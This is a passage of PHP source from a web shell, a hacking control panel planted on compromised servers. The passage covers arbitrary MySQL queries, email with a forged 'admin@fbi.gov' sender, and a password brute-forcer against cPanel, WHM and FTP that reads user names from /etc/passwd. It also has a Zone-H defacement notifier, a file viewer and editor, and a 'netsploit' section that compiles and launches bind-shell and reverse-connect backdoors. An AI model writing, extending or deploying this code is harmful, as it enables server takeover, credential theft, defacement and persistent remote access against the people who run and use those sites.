  1203. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  1204. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  1205. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  1206. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  1207. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  1208. <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
  1209. Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
  1210. for($i = 1;$i <= $totpage;$i++)
  1211. {
  1212. $head .= "<option value=\"".$i."\">".$i.'</option>';
  1213. if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i.'</option>';
  1214. }
  1215. $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>";
  1216. $msg = $msgq.$head.$msg;
  1217. }
  1218. elseif(isset($_GET['submitquery']) &&($_GET['sqlquery'] != ''))
  1219. {
  1220. $db = $_GET['db'];
  1221. $query = magicboom($_GET['sqlquery']);
  1222. $msg = "<div style=\"width:99%;padding:0 10px;\">
  1223. <form action=\"?\" method=\"get\">
  1224. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  1225. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  1226. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  1227. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  1228. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  1229. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  1230. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  1231. <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  1232. <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  1233. </form>
  1234. </div> ";
  1235. @mysql_select_db($db);
  1236. $querys = explode(';',$query);
  1237. foreach($querys as $query)
  1238. {
  1239. if(trim($query) != '')
  1240. {
  1241. $hasil = mysql_query($query);
  1242. if($hasil)
  1243. {
  1244. $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
  1245. <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>";
  1246. $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>";
  1247. for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= '<th>'.htmlspecialchars(@mysql_field_name($hasil,$i)).'</th>';
  1248. $msg .= '</tr>';
  1249. for($i=0;$i<@mysql_num_rows($hasil);$i++)
  1250. {
  1251. $rows=@mysql_fetch_array($hasil);
  1252. $msg .= '<tr>';
  1253. for($j=0;$j<@mysql_num_fields($hasil);$j++)
  1254. {
  1255. if($rows[$j] == '') $dataz = '&nbsp;';
  1256. else $dataz = $rows[$j];
  1257. $msg .= '<td>'.$dataz.'</td>';
  1258. }
  1259. $msg .= '</tr>';
  1260. }
  1261. $msg .= '</table>';
  1262. }
  1263. else
  1264. $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
  1265. }
  1266. }
  1267. }
  1268. else
  1269. {
  1270. $query = "SHOW PROCESSLIST;\n
  1271. SHOW VARIABLES;\n
  1272. SHOW STATUS;";
  1273. $msg = "<div style=\"width:99%;padding:0 10px;\">
  1274. <form action=\"?\" method=\"get\">
  1275. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  1276. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  1277. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  1278. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  1279. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  1280. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  1281. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  1282. <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  1283. <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  1284. </form>
  1285. </div> ";
  1286. $dbs = array();
  1287. $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
  1288. $hasil = @mysql_list_dbs($con);
  1289. while(list($db) = @mysql_fetch_row($hasil)){@array_push($dbs,$db);}
  1290. @sort($dbs);
  1291. foreach($dbs as $db)
  1292. {
  1293. $msg .= "<tr><td><a href=\"?y=".$pwd.'&amp;x=mysql&amp;sqlhost='.$sqlhost.'&amp;sqluser='.$sqluser.'&amp;sqlpass='.$sqlpass.'&amp;sqlport='.$sqlport.'&amp;db='.$db."\">$db</a></td></tr>";
  1294. }
  1295. $msg .= '</table>';
  1296. }
  1297. @mysql_close($con);
  1298. }
  1299. else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>";
  1300. echo $msg;
  1301. }
  1302. else
  1303. {
  1304. ;echo '
  1305. <form action="?" method="get">
  1306. <input type="hidden" name="y" value="';echo $pwd;;echo '" />
  1307. <input type="hidden" name="x" value="mysql" />
  1308. <table class="tabnet" style="width:300px;">
  1309. <tr>
  1310. <th colspan="2">Connect to mySQL server</th>
  1311. </tr>
  1312. <tr>
  1313. <td>&nbsp;&nbsp;Host</td>
  1314. <td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td>
  1315. </tr>
  1316. <tr>
  1317. <td>&nbsp;&nbsp;Username</td>
  1318. <td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td>
  1319. </tr>
  1320. <tr>
  1321. <td>&nbsp;&nbsp;Password</td>
  1322. <td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td>
  1323. </tr>
  1324. <tr>
  1325. <td>&nbsp;&nbsp;Port</td>
  1326. <td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td>
  1327. </tr>
  1328. </table>
  1329. </form>
  1330. ';
  1331. }
  1332. }
  1333. elseif(isset($_GET['x']) &&($_GET['x'] == 'mail'))
  1334. {
  1335. if(isset($_POST['mail_send']))
  1336. {
  1337. $mail_to = $_POST['mail_to'];
  1338. $mail_from = $_POST['mail_from'];
  1339. $mail_subject = $_POST['mail_subject'];
  1340. $mail_content = magicboom($_POST['mail_content']);
  1341. if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from"))
  1342. {$msg = "email sent to $mail_to";}
  1343. else $msg = 'send email failed';
  1344. }
  1345. ;echo '
  1346. <form action="?y=';echo $pwd;;echo '&amp;x=mail" method="post">
  1347. <table class="cmdbox">
  1348. <tr>
  1349. <td>
  1350. <textarea class="output" name="mail_content" id="cmd" style="height:340px;">**</textarea>
  1351. </td>
  1352. </tr>
  1353. <tr>
  1354. <td>
  1355. &nbsp;<input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" />&nbsp; mail to
  1356. </td>
  1357. </tr>
  1358. <tr>
  1359. <td>
  1360. &nbsp;<input class="inputz" style="width:20%;" type="text" value="admin@fbi.gov" name="mail_from" />
  1361. &nbsp; from
  1362. </td>
  1363. </tr>
  1364. <tr>
  1365. <td>
  1366. &nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp; subject
  1367. </td>
  1368. </tr>
  1369. <tr>
  1370. <td>
  1371. &nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" />
  1372. </td>
  1373. </tr>
  1374. <tr>
  1375. <td>&nbsp;&nbsp;&nbsp;&nbsp;';echo $msg;;echo ' </td>
  1376. </tr>
  1377. </table>
  1378. </form>
  1379. ';
  1380. }
  1381. elseif(isset($_GET['x']) &&($_GET['x'] == 'brute'))
  1382. {
  1383. ;echo ' <form action="?y=';echo $pwd;;echo '&amp;x=brute" method="post">
  1384. ';
  1385. @ini_set('memory_limit',999999999999);
  1386. $connect_timeout=5;
  1387. @set_time_limit(0);
  1388. $pokeng = $_REQUEST['submit'];
  1389. $hn = $_REQUEST['users'];
  1390. $crew = $_REQUEST['passwords'];
  1391. $pasti = $_REQUEST['sasaran'];
  1392. $manualtarget = $_REQUEST['target'];
  1393. $bisa = $_REQUEST['option'];
  1394. if($pasti == ''){
  1395. $pasti = 'localhost';
  1396. }
  1397. if($manualtarget == ''){
  1398. $manualtarget = 'http://localhost:2082';
  1399. }
  1400. function get_users()
  1401. {
  1402. $users = array();
  1403. $rows=file('/etc/passwd');
  1404. if(!$rows) return 0;
  1405. foreach ($rows as $string)
  1406. {
  1407. $user = @explode(':',$string);
  1408. if(substr($string,0,1)!='#') array_push($users,$user[0]);
  1409. }
  1410. return $users;
  1411. }
  1412. if(!$users=get_users()) {echo '<center><font face=Verdana size=-2 color=red>'.$lang[$language.'_text96'].'</font></center>';}
  1413. else
  1414. {
  1415. print " <div align='center'>
  1416. <form method='post' style='border: 1px solid #000000'><br><br>
  1417. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1>
  1418. <tr>
  1419. <td>
  1420. <b> Target ! : </font><input type='text' name='sasaran' size='16' value= $pasti class='inputz'></p></font></b></p>
  1421. <div align='center'><br>
  1422. <TABLE style='BORDER-COLLAPSE: collapse'
  1423. cellSpacing=0
  1424. borderColorDark=#666666
  1425. cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
  1426. <tr> <td align='center'> <b>User</b></td> <td> <p align='center'> <b>Pass</b></td>
  1427. </tr>
  1428. </table>
  1429. <p align='center'>
  1430. <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
  1431. foreach($users as $user) {echo $user."\n";}
  1432. print"</textarea>
  1433. <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$crew</textarea><br>
  1434. <br>
  1435. <b>Sila pilih : </span><input name='option' value='manual' style='font-weight: 700;' type='radio'> Manual Target Brute : <input type='text' name='target' size='16' class='inputz' value= $manualtarget ><br />
  1436. <input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
  1437. <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp
  1438. <input name='option' value='whm' style='font-weight: 700;' type='radio'> whm ==> <input type='submit' value='Brute !' name='submit' class='inputzbut'></p>
  1439. </td></tr></table></td></tr></form><p align= 'left'>";
  1440. }
  1441. ;echo '';
  1442. function manual_check($anjink,$asu,$babi,$lonte){
  1443. $ch = curl_init();
  1444. curl_setopt($ch,CURLOPT_URL,"$anjink");
  1445. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  1446. curl_setopt($ch,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);
  1447. curl_setopt($ch,CURLOPT_USERPWD,"$asu:$babi");
  1448. curl_setopt ($ch,CURLOPT_CONNECTTIMEOUT,$lonte);
  1449. curl_setopt($ch,CURLOPT_FAILONERROR,1);
  1450. $data = curl_exec($ch);
  1451. if ( curl_errno($ch) == 28 ) {print '<b> Failed! : NEXT TARGET!</b>';exit;}
  1452. elseif ( curl_errno($ch) == 0 ){
  1453. print "<b>[ CyberSEC@email ]# </b> <b>Completed , Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
  1454. }
  1455. curl_close($ch);
  1456. }
  1457. function ftp_check($link,$user,$pswd,$timeout){
  1458. $ch = curl_init();
  1459. curl_setopt($ch,CURLOPT_URL,"ftp://$link");
  1460. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  1461. curl_setopt($ch,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);
  1462. curl_setopt($ch,CURLOPT_FTPLISTONLY,1);
  1463. curl_setopt($ch,CURLOPT_USERPWD,"$user:$pswd");
  1464. curl_setopt ($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
  1465. curl_setopt($ch,CURLOPT_FAILONERROR,1);
  1466. $data = curl_exec($ch);
  1467. if ( curl_errno($ch) == 28 ) {print '<b> Failed! : NEXT TARGET!</b>';exit;}
  1468. elseif ( curl_errno($ch) == 0 ){
  1469. print "<b>serangan selesai , username = <font color='#FF0000'> $user </font> dan passwordnya = <font color='#FF0000'> $pswd </font></b><br>";
  1470. }
  1471. curl_close($ch);
  1472. }
  1473. function cpanel_check($anjink,$asu,$babi,$lonte){
  1474. $ch = curl_init();
  1475. curl_setopt($ch,CURLOPT_URL,"http://$anjink:2082");
  1476. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  1477. curl_setopt($ch,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);
  1478. curl_setopt($ch,CURLOPT_USERPWD,"$asu:$babi");
  1479. curl_setopt ($ch,CURLOPT_CONNECTTIMEOUT,$lonte);
  1480. curl_setopt($ch,CURLOPT_FAILONERROR,1);
  1481. $data = curl_exec($ch);
  1482. if ( curl_errno($ch) == 28 ) {print '<b> Failed! : NEXT TARGET!</b>';exit;}
  1483. elseif ( curl_errno($ch) == 0 ){
  1484. print "<b>[ CyberSEC@email ]# </b> <b>Completed, Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
  1485. }
  1486. curl_close($ch);
  1487. }
  1488. function whm_check($anjink,$asu,$babi,$lonte){
  1489. $ch = curl_init();
  1490. curl_setopt($ch,CURLOPT_URL,"http://$anjink:2086");
  1491. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  1492. curl_setopt($ch,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);
  1493. curl_setopt($ch,CURLOPT_USERPWD,"$asu:$babi");
  1494. curl_setopt ($ch,CURLOPT_CONNECTTIMEOUT,$lonte);
  1495. curl_setopt($ch,CURLOPT_FAILONERROR,1);
  1496. $data = curl_exec($ch);
  1497. if ( curl_errno($ch) == 28 ) {print '<b> Failed! : NEXT TARGET!</b>';exit;}
  1498. elseif ( curl_errno($ch) == 0 )
  1499. {
  1500. print '<b>[ '.TITLE ." ]# </b> <b>Selesai , Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
  1501. }
  1502. curl_close($ch);
  1503. }
  1504. if(isset($pokeng) &&!empty($pokeng))
  1505. {
  1506. $userlist = explode ("\n",$hn );
  1507. $passlist = explode ("\n",$crew );
  1508. print '<b>[ '.TITLE .' ]# </b> ATTACK...!!! </font></b><br>';
  1509. foreach ($userlist as $asu)
  1510. {
  1511. $_user = trim($asu);
  1512. foreach ($passlist as $babi )
  1513. {
  1514. $_pass = trim($babi);
  1515. if ($bisa == 'manual')
  1516. {manual_check($manualtarget,$_user,$_pass,$lonte);}
  1517. if($bisa == 'ftp')
  1518. {ftp_check($pasti,$_user,$_pass,$lonte);}
  1519. if ($bisa == 'cpanel')
  1520. {cpanel_check($pasti,$_user,$_pass,$lonte);}
  1521. if ($bisa == 'whm')
  1522. {whm_check($pasti,$_user,$_pass,$lonte);}
  1523. }
  1524. }
  1525. }
  1526. }
  1527. elseif(isset($_GET['x']) &&($_GET['x'] == 'reverse'))
  1528. {
  1529. ;echo ' <form action="?y=';echo $pwd;;echo '&amp;x=reverse" method="post">
  1530. <iframe
  1531. src ="http://www.yougetsignal.com/tools/web-sites-on-web-server//"
  1532. height="600"
  1533. width="100%">
  1534. </iframe>
  1535. ';
  1536. }
  1537. elseif(isset($_GET['x']) &&($_GET['x'] == 'mass')){;echo '<form action="?y=';echo $pwd;;echo '&amp;x=mass" method="post">
  1538. <br><br>';echo '<p style="text-align: center;"> <img alt="" src="http://www.zone-h.org/images/logo.gif" style="width: 261px; height: 67px;" /></p>
  1539. <center><span style="font-size:1.6em;"> .: Notifier :. </span></center><center><form action="" method="post"><input class="inputz" type="text" name="defacer" size="67" value="DevilzSec" /><br> <select class="inputz" name="hackmode">
  1540. <option>------------------------------------SELECT-------------------------------------</option>
  1541. <option style="background-color: rgb(0, 0, 0);" value="1">known vulnerability (i.e. unpatched system)</option>
  1542. <option style="background-color: rgb(0, 0, 0);" value="2" >undisclosed (new) vulnerability</option>
  1543. <option style="background-color: rgb(0, 0, 0);" value="3" >configuration / admin. mistake</option>
  1544. <option style="background-color: rgb(0, 0, 0);" value="4" >brute force attack</option>
  1545. <option style="background-color: rgb(0, 0, 0);" value="5" >social engineering</option>
  1546. <option style="background-color: rgb(0, 0, 0);" value="6" >Web Server intrusion</option>
  1547. <option style="background-color: rgb(0, 0, 0);" value="7" >Web Server external module intrusion</option>
  1548. <option style="background-color: rgb(0, 0, 0);" value="8" >Mail Server intrusion</option>
  1549. <option style="background-color: rgb(0, 0, 0);" value="9" >FTP Server intrusion</option>
  1550. <option style="background-color: rgb(0, 0, 0);" value="10" >SSH Server intrusion</option>
  1551. <option style="background-color: rgb(0, 0, 0);" value="11" >Telnet Server intrusion</option>
  1552. <option style="background-color: rgb(0, 0, 0);" value="12" >RPC Server intrusion</option>
  1553. <option style="background-color: rgb(0, 0, 0);" value="13" >Shares misconfiguration</option>
  1554. <option style="background-color: rgb(0, 0, 0);" value="14" >Other Server intrusion</option>
  1555. <option style="background-color: rgb(0, 0, 0);" value="15" >SQL Injection</option>
  1556. <option style="background-color: rgb(0, 0, 0);" value="16" >URL Poisoning</option>
  1557. <option style="background-color: rgb(0, 0, 0);" value="17" >File Inclusion</option>
  1558. <option style="background-color: rgb(0, 0, 0);" value="18" >Other Web Application bug</option>
  1559. <option style="background-color: rgb(0, 0, 0);" value="19" >Remote administrative panel access bruteforcing</option>
  1560. <option style="background-color: rgb(0, 0, 0);" value="20" >Remote administrative panel access password guessing</option>
  1561. <option style="background-color: rgb(0, 0, 0);" value="21" >Remote administrative panel access social engineering</option>
  1562. <option style="background-color: rgb(0, 0, 0);" value="22" >Attack against administrator(password stealing/sniffing)</option>
  1563. <option style="background-color: rgb(0, 0, 0);" value="23" >Access credentials through Man In the Middle attack</option>
  1564. <option style="background-color: rgb(0, 0, 0);" value="24" >Remote service password guessing</option>
  1565. <option style="background-color: rgb(0, 0, 0);" value="25" >Remote service password bruteforce</option>
  1566. <option style="background-color: rgb(0, 0, 0);" value="26" >Rerouting after attacking the Firewall</option>
  1567. <option style="background-color: rgb(0, 0, 0);" value="27" >Rerouting after attacking the Router</option>
  1568. <option style="background-color: rgb(0, 0, 0);" value="28" >DNS attack through social engineering</option>
  1569. <option style="background-color: rgb(0, 0, 0);" value="29" >DNS attack through cache poisoning</option>
  1570. <option style="background-color: rgb(0, 0, 0);" value="30" >Not available</option>
  1571. option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
  1572. </select> <br>
  1573.  
  1574. <select class="inputz" name="reason">
  1575. <option >------------------------------------SELECT-------------------------------------</option>
  1576. <option style="background-color: rgb(0, 0, 0);" value="1" >Heh...just for fun!</option>
  1577. <option style="background-color: rgb(0, 0, 0);" value="2" >Revenge against that website</option>
  1578. <option style="background-color: rgb(0, 0, 0);" value="3" >Political reasons</option>
  1579. <option style="background-color: rgb(0, 0, 0);" value="4" >As a challenge</option>
  1580. <option style="background-color: rgb(0, 0, 0);" value="5" >I just want to be the best defacer</option>
  1581. <option style="background-color: rgb(0, 0, 0);" value="6" >Patriotism</option>
  1582. <option style="background-color: rgb(0, 0, 0);" value="7" >Not available</option>
  1583. option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
  1584. </select> <br>
  1585. <textarea class="inputz" name="domain" cols="90" rows="20">List Of Domains, 20 Rows.</textarea><br>
  1586. <input class="inputz" type="submit" value=" Send Now !! " name="SendNowToZoneH"/>
  1587. </form>';;echo '
  1588. ';
  1589. echo '</form></center>';;echo '
  1590. ';
  1591. function ZoneH($url,$hacker,$hackmode,$reson,$site )
  1592. {
  1593. $k = curl_init();
  1594. curl_setopt($k,CURLOPT_URL,$url);
  1595. curl_setopt($k,CURLOPT_POST,true);
  1596. curl_setopt($k,CURLOPT_POSTFIELDS,'defacer='.$hacker.'&domain1='.$site.'&hackmode='.$hackmode.'&reason='.$reson);
  1597. curl_setopt($k,CURLOPT_FOLLOWLOCATION,true);
  1598. curl_setopt($k,CURLOPT_RETURNTRANSFER,true);
  1599. $kubra = curl_exec($k);
  1600. curl_close($k);
  1601. return $kubra;
  1602. }
  1603. {
  1604. ob_start();
  1605. $sub = @get_loaded_extensions();
  1606. if(!in_array('curl',$sub))
  1607. {
  1608. die('<center><b>[-] Curl Is Not Supported !![-]</b></center>');
  1609. }
  1610. $hacker = $_POST['defacer'];
  1611. $method = $_POST['hackmode'];
  1612. $neden = $_POST['reason'];
  1613. $site = $_POST['domain'];
  1614. if (empty($hacker))
  1615. {
  1616. die ('<center><b>[+] YOU MUST FILL THE ATTACKER NAME [+]</b></center>');
  1617. }
  1618. elseif($method == '--------SELECT--------')
  1619. {
  1620. die('<center><b>[+] YOU MUST SELECT THE METHOD [+]</b></center>');
  1621. }
  1622. elseif($neden == '--------SELECT--------')
  1623. {
  1624. die('<center><b>[+] YOU MUST SELECT THE REASON [+]</b></center>');
  1625. }
  1626. elseif(empty($site))
  1627. {
  1628. die('<center><b>[+] YOU MUST INTER THE SITES LIST [+]</b></center>');
  1629. }
  1630. $i = 0;
  1631. $sites = explode("\n",$site);
  1632. while($i <count($sites))
  1633. {
  1634. if(substr($sites[$i],0,4) != 'http')
  1635. {
  1636. $sites[$i] = 'http://'.$sites[$i];
  1637. }
  1638. ZoneH('http://www.zone-h.com/notify/single',$hacker,$method,$neden,$sites[$i]);
  1639. echo 'Domain : '.$sites[$i].' Defaced Last Years !';
  1640. ++$i;
  1641. }
  1642. echo '[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]';
  1643. }
  1644. ;echo '';}
  1645. elseif(isset($_GET['x']) &&($_GET['x'] == 'phpinfo'))
  1646. {
  1647. @ob_start();
  1648. @eval('phpinfo();');
  1649. $buff = @ob_get_contents();
  1650. @ob_end_clean();
  1651. $awal = strpos($buff,'<body>')+6;
  1652. $akhir = strpos($buff,'</body>');
  1653. echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal).'</div>';
  1654. }
  1655. elseif(isset($_GET['view']) &&($_GET['view'] != ''))
  1656. {
  1657. if(is_file($_GET['view']))
  1658. {
  1659. if(!isset($file)) $file = magicboom($_GET['view']);
  1660. if(!$win &&$posix)
  1661. {
  1662. $name=@posix_getpwuid(@fileowner($file));
  1663. $group=@posix_getgrgid(@filegroup($file));
  1664. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  1665. }
  1666. else {$owner = $user;}
  1667. $filn = basename($file);
  1668. echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
  1669. <tr>
  1670. <td>Filename</td>
  1671. <td>
  1672. <span id=\"".clearspace($filn)."_link\">".$file."</span>
  1673. <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  1674. <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
  1675. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
  1676. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  1677. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  1678. onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
  1679. </form>
  1680. </td>
  1681. </tr>
  1682. <tr>
  1683. <td>Size</td>
  1684. <td>".ukuran($file).'</td>
  1685. </tr>
  1686. <tr>
  1687. <td>Permission</td>
  1688. <td>'.get_perms($file).'</td>
  1689. </tr>
  1690. <tr>
  1691. <td>Owner</td>
  1692. <td>'.$owner.'</td>
  1693. </tr>
  1694. <tr>
  1695. <td>Create time</td>
  1696. <td>'.date('d-M-Y H:i',@filectime($file)).'</td>
  1697. </tr>
  1698. <tr>
  1699. <td>Last modified</td>
  1700. <td>'.date('d-M-Y H:i',@filemtime($file)).'</td>
  1701. </tr>
  1702. <tr>
  1703. <td>Last accessed</td>
  1704. <td>'.date('d-M-Y H:i',@fileatime($file))."</td>
  1705. </tr>
  1706. <tr>
  1707. <td>Actions</td>
  1708. <td><a href=\"?y=$pwd&amp;edit=$file\">edit</a>
  1709. | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a>
  1710. | <a href=\"?y=$pwd&amp;delete=$file\">delete</a>
  1711. | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gz</a>)
  1712. </td>
  1713. </tr>
  1714. <tr>
  1715. <td>View</td>
  1716. <td><a href=\"?y=".$pwd.'&amp;view='.$file."\">text</a>
  1717. | <a href=\"?y=".$pwd.'&amp;view='.$file."&amp;type=code\">code</a>
  1718. | <a href=\"?y=".$pwd.'&amp;view='.$file."&amp;type=image\">img</a>
  1719. </td>
  1720. </tr>
  1721. </table> ";
  1722. if(isset($_GET['type']) &&($_GET['type']=='image'))
  1723. {echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd.'&amp;img='.$filn."\"></div>";}
  1724. elseif(isset($_GET['type']) &&($_GET['type']=='code'))
  1725. {echo "<div class=\"viewfile\">";$file = wordwrap(@file_get_contents($file),'240',"\n");@highlight_string($file);echo '</div>';}
  1726. else {echo "<div class=\"viewfile\">";echo nl2br(htmlentities((@file_get_contents($file))));echo '</div>';}
  1727. }
  1728. elseif(is_dir($_GET['view'])){echo showdir($pwd,$prompt);}
  1729. }
  1730. elseif(isset($_GET['edit']) &&($_GET['edit'] != ''))
  1731. {
  1732. if(isset($_POST['save']))
  1733. {
  1734. $file = $_POST['saveas'];
  1735. $content = magicboom($_POST['content']);
  1736. if($filez = @fopen($file,'w'))
  1737. {
  1738. $time = date('d-M-Y H:i',time());
  1739. if(@fwrite($filez,$content)) $msg = "File Saved <span class=\"gaya\">@</span> ".$time;
  1740. else $msg = 'failed to save';@fclose($filez);
  1741. }
  1742. else $msg = 'OMG!,Permission denied';
  1743. }
  1744. if(!isset($file)) $file = $_GET['edit'];
  1745. if($filez = @fopen($file,'r'))
  1746. {
  1747. $content = '';
  1748. while(!feof($filez))
  1749. {
  1750. $content .= htmlentities(str_replace("''","'",fgets($filez)));
  1751. }
  1752. @fclose($filez);
  1753. };echo '
  1754. <form action="?y=';echo $pwd;;echo '&amp;edit=';echo $file;;echo '" method="post">
  1755. <table class="cmdbox">
  1756. <tr>
  1757. <td colspan="2">
  1758. <textarea class="output" name="content"> ';echo $content;;echo ' </textarea>
  1759. </td>
  1760. <tr>
  1761. <td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="';echo $file;;echo '" />
  1762. <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;';echo $msg;;echo ' </td>
  1763. </tr>
  1764. </table>
  1765. </form>
  1766. ';
  1767. }
  1768. elseif(isset($_GET['x']) &&($_GET['x'] == 'netsploit'))
  1769. {
  1770. if (isset($_POST['bind']) &&!empty($_POST['port']) &&!empty($_POST['bind_pass']) &&($_POST['use'] == 'C'))
  1771. {
  1772. $port = trim($_POST['port']);
  1773. $passwrd = trim($_POST['bind_pass']);
  1774. tulis('bdc.c',$port_bind_bd_c);
  1775. exe('gcc -o bdc bdc.c');
  1776. exe('chmod 777 bdc');
  1777. @unlink('bdc.c');
  1778. exe('./bdc '.$port.' '.$passwrd.' &');
  1779. $scan = exe('ps aux');
  1780. if(eregi("./bdc $por",$scan))
  1781. {
  1782. $msg = '<p>Process found running, backdoor setup successfully.</p>';
  1783. }
  1784. else
  1785. {
  1786. $msg = '<p>Process not found running, backdoor not setup successfully.</p>';
  1787. }
  1788. }
  1789. elseif (isset($_POST['bind']) &&!empty($_POST['port']) &&!empty($_POST['bind_pass']) &&($_POST['use'] == 'Perl'))
  1790. {
  1791. $port = trim($_POST['port']);
  1792. $passwrd = trim($_POST['bind_pass']);
  1793. tulis('bdp',$port_bind_bd_pl);
  1794. exe('chmod 777 bdp');
  1795. $p2=which('perl');
  1796. exe($p2.' bdp '.$port.' &');
  1797. $scan = exe('ps aux');
  1798. if(eregi("$p2 bdp $port",$scan))
  1799. {$msg = '<p>Process found running, backdoor setup successfully.</p>';}
  1800. else {$msg = '<p>Process not found running, backdoor not setup successfully.</p>';}}
  1801. elseif (isset($_POST['backconn']) &&!empty($_POST['backport']) &&!empty($_POST['ip']) &&($_POST['use'] == 'C'))
  1802. {
  1803. $ip = trim($_POST['ip']);
  1804. $port = trim($_POST['backport']);
  1805. tulis('bcc.c',$back_connect_c);
  1806. exe('gcc -o bcc bcc.c');
  1807. exe('chmod 777 bcc');
  1808. @unlink('bcc.c');
  1809. exe('./bcc '.$ip.' '.$port.' &');
  1810. $msg = 'Now script try connect to '.$ip.' port '.$port.' ...';
  1811. }
  1812. elseif (isset($_POST['backconn']) &&!empty($_POST['backport']) &&!empty($_POST['ip']) &&($_POST['use'] == 'Perl'))
  1813. {
  1814. $ip = trim($_POST['ip']);
  1815. $port = trim($_POST['backport']);
  1816. tulis('bcp',$back_connect);
  1817. exe('chmod +x bcp');
